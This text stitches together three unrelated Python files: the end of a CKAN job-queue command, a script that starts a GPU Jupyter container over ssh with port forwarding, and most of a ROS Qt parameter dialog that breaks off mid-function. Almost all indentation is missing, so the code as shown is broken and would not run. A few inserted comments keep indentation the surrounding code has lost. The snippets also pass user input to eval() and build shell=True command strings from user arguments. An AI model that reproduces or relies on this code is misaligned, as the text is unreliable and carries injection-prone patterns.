Cancel a specific job. Jobs can only be canceled while they are
enqueued. Once a worker has started executing a job it cannot
be aborted anymore.
paster jobs clear [QUEUES]
Cancel all jobs on the given queues. If no queue names are
given then ALL queues are cleared.
paster jobs test [QUEUES]
Enqueue a test job. If no queue names are given then the job is
added to the default queue. If queue names are given then a
separate test job is added to each of the queues.
'''
summary = __doc__.split(u'\n')[0]
usage = __doc__
min_args = 0
def __init__(self, *args, **kwargs):
super(JobsCommand, self).__init__(*args, **kwargs)
try:
self.parser.add_option(u'--burst', action='store_true',
default=False,
help=u'Start worker in burst mode.')
except OptionConflictError:
# Option has already been added in previous call
pass
def command(self):
self._load_config()
try:
cmd = self.args.pop(0)
except IndexError:
print(self.__doc__)
sys.exit(0)
if cmd == u'worker':
self.worker()
elif cmd == u'list':
self.list()
elif cmd == u'show':
self.show()
elif cmd == u'cancel':
self.cancel()
elif cmd == u'clear':
self.clear()
elif cmd == u'test':
self.test()
else:
error(u'Unknown command "{}"'.format(cmd))
def worker(self):
from ckan.lib.jobs import Worker
Worker(self.args).work(burst=self.options.burst)
def list(self):
data_dict = {
u'queues': self.args,
}
jobs = p.toolkit.get_action(u'job_list')({}, data_dict)
for job in jobs:
if job[u'title'] is None:
job[u'title'] = ''
else:
job[u'title'] = u'"{}"'.format(job[u'title'])
print(u'{created} {id} {queue} {title}'.format(**job))
def show(self):
if not self.args:
error(u'You must specify a job ID')
id = self.args[0]
try:
job = p.toolkit.get_action(u'job_show')({}, {u'id': id})
except logic.NotFound:
error(u'There is no job with ID "{}"'.format(id))
print(u'ID: {}'.format(job[u'id']))
if job[u'title'] is None:
title = u'None'
else:
title = u'"{}"'.format(job[u'title'])
print(u'Title: {}'.format(title))
print(u'Created: {}'.format(job[u'created']))
print(u'Queue: {}'.format(job[u'queue']))
def cancel(self):
if not self.args:
error(u'You must specify a job ID')
id = self.args[0]
try:
p.toolkit.get_action(u'job_cancel')({}, {u'id': id})
except logic.NotFound:
error(u'There is no job with ID "{}"'.format(id))
print(u'Cancelled job {}'.format(id))
def clear(self):
data_dict = {
u'queues': self.args,
}
queues = p.toolkit.get_action(u'job_clear')({}, data_dict)
queues = (u'"{}"'.format(q) for q in queues)
print(u'Cleared queue(s) {}'.format(u', '.join(queues)))
def test(self):
from ckan.lib.jobs import DEFAULT_QUEUE_NAME, enqueue, test_job
for queue in (self.args or [DEFAULT_QUEUE_NAME]):
job = enqueue(test_job, [u'A test job'], title=u'A test job', queue=queue)
print(u'Added test job {} to queue "{}"'.format(job.id, queue))
|
frython.py
|
#!/usr/bin/env python
# a simple script to set up a GPU-enabled Jupyter notebook on Fry/Fry2
# assumes you have an account on there already
import argparse
import signal
import subprocess
import threading
import time
import webbrowser
# TODO: have some kinda config file for this
def launch_tab(port):
time.sleep(5)
webbrowser.get("chrome").open_new_tab(f"http://localhost:{port}")
def main():
parser = argparse.ArgumentParser(
prog="frython",
description=(
"Launch a docker instance on Fry (default: TensorFlow)\n"
"and forward it to a local port so you can use jupyter"
),
)
parser.add_argument("-u", "--username", required=True, help="Username on Fry")
parser.add_argument(
"-p", "--port", type=int, required=True, help="Port to use on Fry and locally"
)
parser.add_argument("-g", "--gpus", required=True, help="GPU(s) to use. Be nice!")
parser.add_argument(
"-c",
"--container",
default="gcr.io/tensorflow/tensorflow:latest-gpu-py3",
help="Container to run. Default: latest tensorflow-gpu-py3",
)
parser.add_argument("-x", "--command", default=None)
parser.add_argument("--server", default="fry", choices=("fry", "fry2"))
args = parser.parse_args()
gpu_cmd = [
"ssh",
"-tt",
"{}@{}".format(args.username, args.server),
" ".join(
(
f"NV_GPU={args.gpus} nvidia-docker run -it --rm",
f"-p {args.port}:8888",
f"-v /home/{args.username}:/notebooks/{args.username}",
args.container,
args.command or "",
)
),
]
port_cmd = [
"ssh",
"-NL",
"localhost:{}:localhost:{}".format(args.port, args.port),
"{}@{}".format(args.username, args.server),
]
print("Running\n\t{}".format(" ".join(port_cmd)))
port_proc = subprocess.Popen(" ".join(port_cmd), shell=True)
tab = threading.Thread(target=launch_tab, args=(args.port,))
tab.start()
print("Running\n\t{}".format(" ".join(gpu_cmd)))
gpu_proc = subprocess.call(" ".join(gpu_cmd), shell=True)
port_proc.send_signal(signal.SIGKILL)
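# Entry point (assumed): as captured here the script never calls main(), so
# this guard is a hypothetical addition for running it directly.
if __name__ == "__main__":
    main()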
|
parameter_dialog.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from python_qt_binding.QtCore import Qt, Signal
from python_qt_binding.QtGui import QBrush, QColor, QIcon, QPalette
from xmlrpclib import Binary
import os
import roslib.msgs
import roslib.names
import rospy
import sys
import threading
from node_manager_fkie.detailed_msg_box import WarningMessageBox
from node_manager_fkie.editor.line_edit import EnchancedLineEdit
from node_manager_fkie.parameter_handler import ParameterHandler
import node_manager_fkie as nm
try:
from python_qt_binding.QtGui import QApplication, QComboBox, QCheckBox, QLineEdit, QMessageBox, QScrollArea, QWidget
from python_qt_binding.QtGui import QFormLayout, QHBoxLayout, QVBoxLayout, QSpacerItem, QSizePolicy
from python_qt_binding.QtGui import QFrame, QDialog, QDialogButtonBox, QFileDialog, QLabel, QPushButton, QTextEdit
except:
from python_qt_binding.QtWidgets import QApplication, QComboBox, QCheckBox, QLineEdit, QMessageBox, QScrollArea, QWidget
from python_qt_binding.QtWidgets import QFormLayout, QHBoxLayout, QVBoxLayout, QSpacerItem, QSizePolicy
from python_qt_binding.QtWidgets import QFrame, QDialog, QDialogButtonBox, QFileDialog, QLabel, QPushButton, QTextEdit
def str2bool(val):
return val.lower() in ("yes", "true", "t", "1")
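# Doctest-style examples for the helper above (illustrative only):
#   >>> str2bool('True')
#   True
#   >>> str2bool('0')
#   False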
class MyComboBox(QComboBox):
remove_item_signal = Signal(str)
def __init__(self, parent=None):
QComboBox.__init__(self, parent=parent)
self.parameter_description = None
def keyPressEvent(self, event):
key_mod = QApplication.keyboardModifiers()
if key_mod & Qt.ShiftModifier and (event.key() == Qt.Key_Delete):
try:
curr_text = self.currentText()
if curr_text:
for i in range(self.count()):
if curr_text == self.itemText(i):
self.removeItem(i)
self.remove_item_signal.emit(curr_text)
self.clearEditText()
except:
import traceback
print traceback.format_exc(1)
QComboBox.keyPressEvent(self, event)
class ParameterDescription(object):
'''
Used for internal representation of the parameter in dialog.
'''
def __init__(self, name, msg_type, value=None, widget=None):
self._name = str(name)
self._type = msg_type
if isinstance(self._type, dict):
self._type = 'dict'
elif isinstance(self._type, list):
self._type = 'list'
self._value = value
self._value_org = value
self._widget = widget
try:
self._base_type, self._is_array_type, self._array_length = roslib.msgs.parse_type(self._type)
except:
pass
if msg_type == 'binary':
self._base_type = msg_type
def __repr__(self):
return ''.join([self._name, ' [', self._type, ']'])
def origin_value(self):
return self._value_org
def changed(self):
return unicode(self.origin_value()) != unicode(self._value)
def name(self):
return self._name
def setWidget(self, widget):
self._widget = widget
if widget is not None:
widget.parameter_description = self
self.addCachedValuesToWidget()
def widget(self):
return self._widget
def fullName(self):
result = self.name()
widget = self._widget
while widget is not None:
if isinstance(widget, (MainBox, GroupBox, ArrayBox)):
result = roslib.names.ns_join(widget.name, result)
widget = widget.parent()
return result
def isArrayType(self):
# handle representation of `rosparam`
return self._is_array_type or self._type in ['[]']
def arrayLength(self):
return self._array_length
def isPrimitiveType(self):
result = self._base_type in roslib.msgs.PRIMITIVE_TYPES
result = result or self._base_type in ['int', 'float', 'time', 'duration', 'binary']
# if value is a string, the list is represented as a string, see `rosparam`
result = result or self._type in ['[]']
return result
def isTimeType(self):
return self._base_type in ['time', 'duration']
def isBinaryType(self):
return self._base_type in ['binary']
def baseType(self):
return self._base_type
def updateValueFromField(self):
field = self.widget()
result = ''
if isinstance(field, QCheckBox):
result = repr(field.isChecked())
elif isinstance(field, QLineEdit):
result = field.text()
elif isinstance(field, QComboBox):
result = field.currentText()
self.updateValue(result)
def updateValue(self, value):
try:
if isinstance(value, (dict, list)):
self._value = value
elif value:
nm.history().addParamCache(self.fullName(), value)
if self.isArrayType():
if 'int' in self.baseType() or 'byte' in self.baseType():
self._value = map(int, value.lstrip('[').rstrip(']').split(','))
elif 'float' in self.baseType():
self._value = map(float, value.lstrip('[').rstrip(']').split(','))
elif 'bool' in self.baseType():
self._value = map(str2bool, value.lstrip('[').rstrip(']').split(','))
elif self.isBinaryType():
self._value = value
else:
try:
import yaml
self._value = yaml.load("[%s]" % value)
# if there is no YAML, load() will return None. We want an
# empty list instead for our representation of empty.
if self._value is None:
self._value = []
except yaml.MarkedYAMLError, e:
raise Exception("Field [%s] yaml error: %s" % (self.fullName(), str(e)))
if not self.arrayLength() is None and self.arrayLength() != len(self._value):
raise Exception(''.join(["Field [", self.fullName(), "] has incorrect number of elements: ", str(len(self._value)), " != ", str(self.arrayLength())]))
else:
if 'int' in self.baseType() or 'byte' in self.baseType():
self._value = int(value)
elif 'float' in self.baseType():
self._value = float(value)
elif 'bool' in self.baseType():
if isinstance(value, bool):
self._value = value
else:
self._value = str2bool(value)
elif self.isBinaryType():
self._value = unicode(value)
elif self.isTimeType():
if value == 'now':
self._value = 'now'
else:
try:
val = eval(value)
if isinstance(val, dict):
self._value = val
else:
secs = int(val)
nsecs = int((val - secs) * 1000000000)
self._value = {'secs': secs, 'nsecs': nsecs}
except:
self._value = {'secs': 0, 'nsecs': 0}
else:
self._value = value.encode(sys.getfilesystemencoding())
else:
if self.isArrayType():
arr = []
self._value = arr
else:
if 'int' in self.baseType() or 'byte' in self.baseType():
self._value = 0
elif 'float' in self.baseType():
self._value = 0.0
elif 'bool' in self.baseType():
self._value = False
elif self.isBinaryType():
self._value = unicode(value)
elif self.isTimeType():
self._value = {'secs': 0, 'nsecs': 0}
else:
self._value = ''
nm.history().addParamCache(self.fullName(), value)
except Exception, e:
raise Exception(''.join(["Error while set value '", unicode(value), "' for '", self.fullName(), "': ", str(e)]))
return self._value
def value(self):
if not self.isPrimitiveType() and not self.widget() is None:
return self.widget().value()
elif self.isPrimitiveType():
self.updateValueFromField()
# if self.isTimeType() and self._value == 'now':
# # FIX: rostopic does not support 'now' values in sub-headers
# t = time.time()
# return ({'secs': int(t), 'nsecs': int((t-int(t))*1000000)}, self.changed())
return (self._value, self.changed())
def removeCachedValue(self, value):
nm.history().removeParamCache(self.fullName(), value)
def createTypedWidget(self, parent):
result = None
if self.isPrimitiveType():
value = self._value
if 'bool' in self.baseType():
result = QCheckBox(parent=parent)
result.setObjectName(self.name())
if not isinstance(value, bool):
value = str2bool(value[0] if isinstance(value, list) else value)
self._value_org = value
result.setChecked(value)
else:
result = MyComboBox(parent=parent)
result.setObjectName(self.name())
result.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed))
result.setEditable(True)
result.remove_item_signal.connect(self.removeCachedValue)
items = []
if isinstance(value, list):
if self.isArrayType():
items.append(','.join([str(val) for val in value]))
else:
items[len(items):] = value
else:
if value is not None and value:
items.append(unicode(value) if not isinstance(value, Binary) else '{binary data!!! updates will be ignored!!!}')
elif self.isTimeType():
items.append('now')
self._value_org = items[0] if items else ''
result.addItems(items)
else:
if self.isArrayType():
result = ArrayBox(self.name(), self._type, parent=parent)
else:
result = GroupBox(self.name(), self._type, parent=parent)
return result
def addCachedValuesToWidget(self):
if isinstance(self.widget(), QComboBox):
values = nm.history().cachedParamValues(self.fullName())
for i in range(self.widget().count()):
try:
values.remove(self.widget().itemText(i))
except:
pass
if self.widget().count() == 0:
values.insert(0, '')
self.widget().addItems(values)
class MainBox(QWidget):
'''
    Groups the parameters without visualizing the group itself. It is the main widget.
'''
def __init__(self, name, param_type, collapsible=True, parent=None):
QWidget.__init__(self, parent)
self.setObjectName(name)
self.name = name
self.type = param_type
self.params = []
self.collapsed = False
self.parameter_description = None
vLayout = QVBoxLayout()
vLayout.setSpacing(0)
self.options_layout = QHBoxLayout()
self.param_widget = QFrame()
self.name_label = QLabel(name)
font = self.name_label.font()
font.setBold(True)
self.name_label.setFont(font)
self.type_label = QLabel(''.join([' (', param_type, ')']))
if collapsible:
self.hide_button = QPushButton('-')
self.hide_button.setFlat(True)
self.hide_button.setMaximumSize(20, 20)
self.hide_button.clicked.connect(self._on_hide_clicked)
self.options_layout.addWidget(self.hide_button)
self.options_layout.addWidget(self.name_label)
self.options_layout.addWidget(self.type_label)
self.options_layout.addStretch()
vLayout.addLayout(self.options_layout)
self.param_widget.setFrameShape(QFrame.Box)
self.param_widget.setFrameShadow(QFrame.Raised)
boxLayout = QFormLayout()
boxLayout.setVerticalSpacing(0)
self.param_widget.setLayout(boxLayout)
vLayout.addWidget(self.param_widget)
self.setLayout(vLayout)
if param_type in ['std_msgs/Header']:
self.setCollapsed(True)
def setCollapsed(self, value):
self.collapsed = value
self.param_widget.setVisible(not value)
self.hide_button.setText('+' if self.collapsed else '-')
def _on_hide_clicked(self):
self.setCollapsed(not self.collapsed)
# self.param_widget.setVisible(not self.param_widget.isVisible())
# vis = self.param_widget.isVisible()
# self.hide_button.setText('-' if vis else '+')
def createFieldFromValue(self, value):
self.setUpdatesEnabled(False)
try:
if isinstance(value, (dict, list)):
self._createFieldFromDict(value)
finally:
self.setUpdatesEnabled(True)
def _createFieldFromDict(self, value, layout=None):
if layout is None:
layout = self.param_widget.layout()
        # sort the items: 1. header, 2. all primitives (sorted), 3. list, dict (sorted)
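        # `value` maps each field name to a (type, value) tuple, e.g. (illustrative):
        #   {'frame_id': ('string', ''), 'stamp': ('time', 'now'), 'seq': ('uint32', 0)}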
all_params = []
primitives = []
komplex = []
for name, (_type, val) in value.items():
if _type in ['std_msgs/Header']:
all_params.append((name, _type, val))
elif isinstance(val, (dict, list)):
komplex.append((name, _type, val))
else:
primitives.append((name, _type, val))
all_params.extend(sorted(primitives))
all_params.extend(sorted(komplex))
# create widgets
for name, _type, val in all_params:
field = self.getField(name)
if field is None:
param_desc = ParameterDescription(name, _type, val)
field = param_desc.createTypedWidget(self)
param_desc.setWidget(field)
self.params.append(param_desc)
if isinstance(field, (GroupBox, ArrayBox)):
field.createFieldFromValue(val)
layout.addRow(field)
else:
label_name = name if _type == 'string' else ''.join([name, ' (', _type, ')'])
label = QLabel(label_name, self)
label.setObjectName(''.join([name, '_label']))
label.setBuddy(field)
layout.addRow(label, field)
else:
if isinstance(field, (GroupBox, ArrayBox)):
field.createFieldFromValue(val)
else:
raise Exception(''.join(["Parameter with name '", name, "' already exists!"]))
def value(self):
result = dict()
for param in self.params:
if not param.isBinaryType():
result[param.name()] = param.value()
return result
def set_values(self, values):
'''
Sets the values for existing fields.
:param values: the dictionary with values to set.
:type values: dict
:raise Exception: on errors
'''
if isinstance(values, dict):
for param, val in values.items():
value = val
_type = 'unknown'
if isinstance(val, tuple):
(_type, value) = val
field = self.getField(param)
if field is not None:
if isinstance(field, (GroupBox, ArrayBox)):
field.set_values(value)
else:
if isinstance(field, QCheckBox):
if not isinstance(value, bool):
value = str2bool(value[0] if isinstance(value, list) else value)
field.setChecked(value)
elif isinstance(field, QLineEdit):
# avoid ' or " that escapes the string values
field.setText(', '.join([unicode(v) for v in value]) if isinstance(value, list) else unicode(value))
elif isinstance(field, QComboBox):
field.setEditText(', '.join([unicode(v) for v in value]) if isinstance(value, list) else unicode(value))
elif isinstance(values, list):
raise Exception("Setting 'list' values in MainBox or GroupBox not supported!!!")
def getField(self, name, recursive=False):
for child in self.children():
for c in child.children():
if recursive and isinstance(c, MainBox):
result = c.getField(name, recursive=recursive)
if result is not None:
return result
elif c.objectName() == name:
return c
return None
def removeAllFields(self):
'''
        Removes the references between parameters and their corresponding widgets
        (ComboBox, CheckBox, ...) and removes these widgets from the layouts.
'''
for child in self.param_widget.children():
if isinstance(child, MyComboBox):
child.parameter_description.setWidget(None)
self.params.remove(child.parameter_description)
elif isinstance(child, MainBox):
child.removeAllFields()
self.param_widget.layout().removeWidget(child)
def filter(self, arg):
'''
        Hides the parameter input fields whose labels don't contain C{arg}.
@param arg: the filter text
@type arg: C{str}
'''
result = False
for child in self.param_widget.children():
if isinstance(child, (MainBox, GroupBox, ArrayBox)):
show = not arg or child.objectName().lower().find(arg.lower()) != -1
show = child.filter(arg) or show
# hide group, if no parameter are visible
child.setVisible(show)
if show:
child.setCollapsed(False)
result = True
elif isinstance(child, (QWidget)) and not isinstance(child, (QLabel)) and not isinstance(child, (QFrame)):
label = child.parentWidget().layout().labelForField(child)
if label is not None:
has_text = child.objectName().lower().find(arg.lower()) == -1
show = not arg or (not has_text or (hasattr(child, 'currentText') and not has_text))
# set the parent group visible if it is not visible
if show and not child.parentWidget().isVisible():
child.parentWidget().setVisible(show)
label.setVisible(show)
child.setVisible(show)
if show:
result = True
return result
def setVisible(self, arg):
if arg and not self.parentWidget() is None and not self.parentWidget().isVisible():
self.parentWidget().setVisible(arg)
QWidget.setVisible(self, arg)
class GroupBox(MainBox):
'''
    Groups the parameters of a dictionary, struct or class using a group box for
visualization.
'''
def __init__(self, name, param_type, parent=None):
MainBox.__init__(self, name, param_type, True, parent)
self.setObjectName(name)
class ArrayEntry(MainBox):
'''
A part of the ArrayBox to represent the elements of a list.
'''
def __init__(self, index, param_type, parent=None):
MainBox.__init__(self, ''.join(['#', str(index)]), param_type, True, parent)
self.index = index
self.setObjectName(''.join(['[', str(index), ']']))
self.param_widget.setFrameShape(QFrame.Box)
self.param_widget.setFrameShadow(QFrame.Plain)
self.type_label.setVisible(False)
# boxLayout = QFormLayout()
# boxLayout.setVerticalSpacing(0)
# label = QLabel(''.join(['[', str(index), ']']))
# self.param_widget.layout().addRow(label)
# self.setLayout(boxLayout)
def value(self):
result = dict()
for param in self.params:
result[param.name()] = param.value()
return result
class ArrayBox(MainBox):
'''
    Groups the parameters of a list.
'''
def __init__(self, name, param_type, parent=None):
MainBox.__init__(self, name, param_type, True, parent)
self._dynamic_value = None
self._dynamic_widget = None
self._dynamic_items_count = 0
def addDynamicBox(self):
self._dynamic_items_count = 0
addButton = QPushButton("+")
addButton.setMaximumSize(25, 25)
addButton.clicked.connect(self._on_add_dynamic_entry)
self.options_layout.addWidget(addButton)
self.count_label = QLabel('0')
self.options_layout.addWidget(self.count_label)
remButton = QPushButton("-")
remButton.setMaximumSize(25, 25)
remButton.clicked.connect(self._on_rem_dynamic_entry)
self.options_layout.addWidget(remButton)
def _on_add_dynamic_entry(self):
self.setUpdatesEnabled(False)
try:
if self._dynamic_value is not None:
for v in self._dynamic_value:
if isinstance(v, dict):
entry_frame = ArrayEntry(self._dynamic_items_count, self.type)
self.param_widget.layout().addRow(entry_frame)
entry_frame._createFieldFromDict(v)
self._dynamic_items_count += 1
self.count_label.setText(str(self._dynamic_items_count))
break
finally:
self.setUpdatesEnabled(True)
def _on_rem_dynamic_entry(self):
if self._dynamic_items_count > 0:
self._dynamic_items_count -= 1
item = self.param_widget.layout().takeAt(self._dynamic_items_count)
self.param_widget.layout().removeItem(item)
try:
# remove the referenced parameter, too
for child in item.widget().children():
if isinstance(child, MyComboBox):
child.parameter_description.setWidget(None)
self.params.remove(child.parameter_description)
elif isinstance(child, MainBox):
child.removeAllFields()
self.param_widget.layout().removeWidget(child)
child.parameter_description.setWidget(None)
self.params.remove(child.parameter_description)
item.widget().setParent(None)
del item
except:
import traceback
print traceback.format_exc(1)
self.count_label.setText(str(self._dynamic_items_count))
def createFieldFromValue(self, value):
self.setUpdatesEnabled(False)
try:
if isinstance(value, list):
self.addDynamicBox()
self._dynamic_value = value
self.set_values(value)
finally:
self.setUpdatesEnabled(True)
def value(self):
'''
        Goes through the list and collects the value dictionary of each element.
'''
result = list()
for i in range(self.param_widget.layout().rowCount()):
item = self.param_widget.layout().itemAt(i, QFormLayout.SpanningRole)
if item and isinstance(item.widget(), ArrayEntry):
result.append(item.widget().value())
return result
def set_values(self, values):
'''
        Creates the list elements and sets their values.
:param values: The list of dictionaries with parameter values
:type values: list
'''
if isinstance(values, list):
count_entries = 0
# determine the count of existing elements
for i in range(self.param_widget.layout().rowCount()):
item = self.param_widget.layout().itemAt(i, QFormLayout.SpanningRole)
if item and isinstance(item.widget(), ArrayEntry):
count_entries += 1
# create the list of the elements of the length of values
if count_entries < len(values):
for i in range(len(values) - count_entries):
self._on_add_dynamic_entry()
elif count_entries > len(values):
for i in range(count_entries - len(values)):
self._on_rem_dynamic_entry()
# set the values
for i in range(self.param_widget.layout().rowCount()):
item = self.param_widget.layout().itemAt(i, QFormLayout.SpanningRole)
if item and isinstance(item.widget(), ArrayEntry):
item.widget().set_values(values[i])
class ScrollArea(QScrollArea):
'''
    ScrollArea limits the maximum width of the internal widget to the width of the viewport.
'''
def viewportEvent(self, arg):
if self.widget() and self.viewport().size().width() != self.widget().maximumWidth():
self.widget().setMaximumWidth(self.viewport().size().width())
return QScrollArea.viewportEvent(self, arg)
class ParameterDialog(QDialog):
'''
    This dialog creates an input mask for the given parameters and their types.
'''
def __init__(self, params=dict(), buttons=QDialogButtonBox.Cancel | QDialogButtonBox.Ok, sidebar_var='', parent=None):
'''
Creates an input dialog.
@param params: a dictionary with parameter names and (type, values).
        The C{value} can be a primitive value, a list of values or a parameter
        dictionary to create groups. In this case the type is the name of the group.
@type params: C{dict(str:(str, {value, [..], dict()}))}
'''
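        # an illustrative `params` argument (names and types are only examples):
        #   {'rate': ('float', 10.0),
        #    'options': ('options', {'debug': ('bool', False), 'name': ('string', '')})}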
QDialog.__init__(self, parent=parent)
self.setObjectName('ParameterDialog - %s' % str(params))
self.__current_path = nm.settings().current_dialog_path
self.horizontalLayout = QHBoxLayout(self)
self.horizontalLayout.setObjectName("horizontalLayout")
self.horizontalLayout.setContentsMargins(1, 1, 1, 1)
self.verticalLayout = QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.verticalLayout.setContentsMargins(1, 1, 1, 1)
# add filter row
self.filter_frame = QFrame(self)
filterLayout = QHBoxLayout(self.filter_frame)
filterLayout.setContentsMargins(1, 1, 1, 1)
label = QLabel("Filter:", self.filter_frame)
self.filter_field = EnchancedLineEdit(self.filter_frame)
filterLayout.addWidget(label)
filterLayout.addWidget(self.filter_field)
self.filter_field.textChanged.connect(self._on_filter_changed)
self.filter_visible = True
self.verticalLayout.addWidget(self.filter_frame)
# create area for the parameter
self.scrollArea = scrollArea = ScrollArea(self)
scrollArea.setObjectName("scrollArea")
scrollArea.setWidgetResizable(True)
self.content = MainBox('/', 'str', False, self)
scrollArea.setWidget(self.content)
self.verticalLayout.addWidget(scrollArea)
# add info text field
self.info_field = QTextEdit(self)
self.info_field.setVisible(False)
palette = QPalette()
brush = QBrush(QColor(255, 254, 242))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Active, QPalette.Base, brush)
brush = QBrush(QColor(255, 254, 242))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Inactive, QPalette.Base, brush)
brush = QBrush(QColor(244, 244, 244))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Disabled, QPalette.Base, brush)
self.info_field.setPalette(palette)
self.info_field.setFrameShadow(QFrame.Plain)
self.info_field.setReadOnly(True)
self.info_field.setTextInteractionFlags(Qt.LinksAccessibleByKeyboard | Qt.LinksAccessibleByMouse | Qt.TextBrowserInteraction | Qt.TextSelectableByKeyboard | Qt.TextSelectableByMouse)
self.info_field.setObjectName("dialog_info_field")
self.verticalLayout.addWidget(self.info_field)
# create buttons
self.buttonBox = QDialogButtonBox(self)
self.buttonBox.setObjectName("buttonBox")
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(buttons)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
self.verticalLayout.addWidget(self.buttonBox)
self.horizontalLayout.addLayout(self.verticalLayout)
# add side bar for checklist
values = nm.history().cachedParamValues('/%s' % sidebar_var)
self.sidebar_frame = QFrame()
self.sidebar_frame.setObjectName(sidebar_var)
sidebarframe_verticalLayout = QVBoxLayout(self.sidebar_frame)
sidebarframe_verticalLayout.setObjectName("sidebarframe_verticalLayout")
sidebarframe_verticalLayout.setContentsMargins(1, 1, 1, 1)
self._sidebar_selected = 0
if len(values) > 1 and sidebar_var in params:
self.horizontalLayout.addWidget(self.sidebar_frame)
try:
self.sidebar_default_val = params[sidebar_var][1]
except:
self.sidebar_default_val = ''
values.sort()
for v in values:
checkbox = QCheckBox(v)
checkbox.setObjectName(v)
checkbox.stateChanged.connect(self._on_sidebar_stateChanged)
self.sidebar_frame.layout().addWidget(checkbox)
self.sidebar_frame.layout().addItem(QSpacerItem(100, 20, QSizePolicy.Minimum, QSizePolicy.Expanding))
# set the input fields
if params:
self.content.createFieldFromValue(params)
self.setInfoActive(False)
if self.filter_frame.isVisible():
self.filter_field.setFocus()
self.setMinimumSize(350, 200)
def __del__(self):
self.content.removeAllFields()
def _on_sidebar_stateChanged(self, state):
if state == Qt.Checked:
self._sidebar_selected += 1
elif state == Qt.Unchecked:
self._sidebar_selected -= 1
if self._sidebar_selected in [0, 1]:
try:
field = self.content.getField(self.sidebar_frame.objectName())
if field is not None and field.currentText() == self.sidebar_default_val:
field.setEnabled(True if self._sidebar_selected == 0 else False)
except:
pass
def showLoadSaveButtons(self):
self.load_button = QPushButton()
self.load_button.setIcon(QIcon(':/icons/load.png'))
self.load_button.clicked.connect(self._load_parameter)
self.load_button.setToolTip('Load parameters from YAML file')
self.load_button.setFlat(True)
self.buttonBox.addButton(self.load_button, QDialogButtonBox.ActionRole)
self.save_button = QPushButton()
self.save_button.clicked.connect(self._save_parameter)
self.save_button.setIcon(QIcon(':/icons/save.png'))
self.save_button.setToolTip('Save parameters to YAML file')
self.save_button.setFlat(True)
self.buttonBox.addButton(self.save_button, QDialogButtonBox.ActionRole)
def _on_filter_changed(self):
self.content.filter(self.filter_field.text())
def setFilterVisible(self, val):
'''
Shows or hides the filter row.
'''
self.filter_visible = val
self.filter_frame.setVisible(val & self.scrollArea.isHidden())
def add_warning(self, message):
label = QLabel()
label.setWordWrap(True)
label.setText(''.join(["<font color='red'>Warning!\n", message, "</font>"]))
self.verticalLayout.insertWidget(1, label)
def setText(self, text):
'''
        Shows the given text in the info field of the dialog.
@param text: the text to add to the dialog
@type text: C{str}
'''
self.info_field.setText(text)
self.setInfoActive(True)
def setInfoActive(self, val):
'''
Activates or deactivates the info field of this dialog. If info field is
activated, the filter frame and the input field are deactivated.
@type val: C{bool}
'''
if val and self.info_field.isHidden():
self.filter_frame.setVisible(False & self.filter_visible)
self.scrollArea.setVisible(False)
self.info_field.setVisible(True)
elif not val and self.scrollArea.isHidden():
self.filter_frame.setVisible(True & self.filter_visible)
self.scrollArea.setVisible(True)
self.info_field.setVisible(False)
if self.filter_frame.isVisible():
self.filter_field.setFocus()
def setFocusField(self, field_label):
field = self.content.getField(field_label, recursive=True)
if field is not None:
field.setFocus()
def getKeywords(self, only_changed=False):
'''
@param only_changed: requests only changed parameter
@type only_changed: bool (Default: False)
        @returns: a dictionary with parameter and value for all entered fields.
@rtype: C{dict(str(param) : str(value))}
'''
# get the results of sidebar
sidebar_list = []
sidebar_name = self.sidebar_frame.objectName()
for j in range(self.sidebar_frame.layout().count() - 1):
w = self.sidebar_frame.layout().itemAt(j).widget()
if isinstance(w, QCheckBox):
if w.checkState() == Qt.Checked:
sidebar_list.append((w.objectName(), True))
result_value = self.content.value()
# add the sidebar results
if sidebar_name in result_value:
# skip the default value, if elements are selected in the side_bar
if len(sidebar_list) == 0 or self.sidebar_default_val != result_value[sidebar_name][0]:
sidebar_list.append(result_value[sidebar_name])
result_value[sidebar_name] = ([v for v, _ in set(sidebar_list)], True) # _:=changed
result = self._remove_change_state(result_value, only_changed)
return result
def keywords2params(self, keywords):
'''
Resolves the dictionary values to ROS parameter names.
@param keywords: the result of the getKeywords
@return: dictionary of (ROS parameter name : value)
'''
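        # e.g. {'ns': {'rate': 10.0}, 'use_sim_time': True}
        #   is resolved to {'ns/rate': 10.0, 'use_sim_time': True}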
result = dict()
for param, value in keywords.items():
if isinstance(value, dict):
r = self.keywords2params(value)
for p, v in r.items():
result[roslib.names.ns_join(param, p)] = v
else:
result[param] = value
return result
def _remove_change_state(self, params, only_changed):
result = dict()
for param, value in params.items():
if isinstance(value, dict):
r = self._remove_change_state(value, only_changed)
if r:
